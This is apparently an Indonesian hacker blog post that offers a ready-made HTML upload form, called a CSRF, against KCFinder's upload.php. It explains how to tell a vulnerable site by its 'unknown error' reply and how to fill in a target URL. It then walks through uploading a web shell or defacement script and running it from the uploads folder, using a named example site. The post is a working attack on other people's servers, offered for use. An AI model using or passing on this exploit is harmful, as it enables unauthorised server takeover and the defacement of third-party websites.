karna banyak yg request . gw mau share csrf kcfinder
gausa basa basi ini dia csrfnya
<form method="POST" action="site.com/path/upload.php"enctype="multipart/form-data"><input type="file" name="Filedata" /><button>crot</button></form>
cara menggunakannya
-contohnya kalian dapet web http://secghost.com/admin/kcfinder/upload.php kalian eksekusi keluar pesan "unknown error" berarti itu web vuln. langsung saja masukin ke csrf. sehingga csrfnya menjadi seperti ini
<form method="POST" action="http://secghost.com/admin/kcfinder/upload.php"enctype="multipart/form-data"><input type="file" name="Filedata" /><button>crot</button></form>-simpan dengan ekstensi html kemudian buka di browser
-browse file shell/script deface kalian kemudian klik crot
-jika muncul peringatan blank/kosong berarti file berhasil di upload
-eksekusi file kalian di http://secghost.com/admin/kcfinder/upload/files/shell/sckalian
Thanks ^^
ConversionConversion EmoticonEmoticon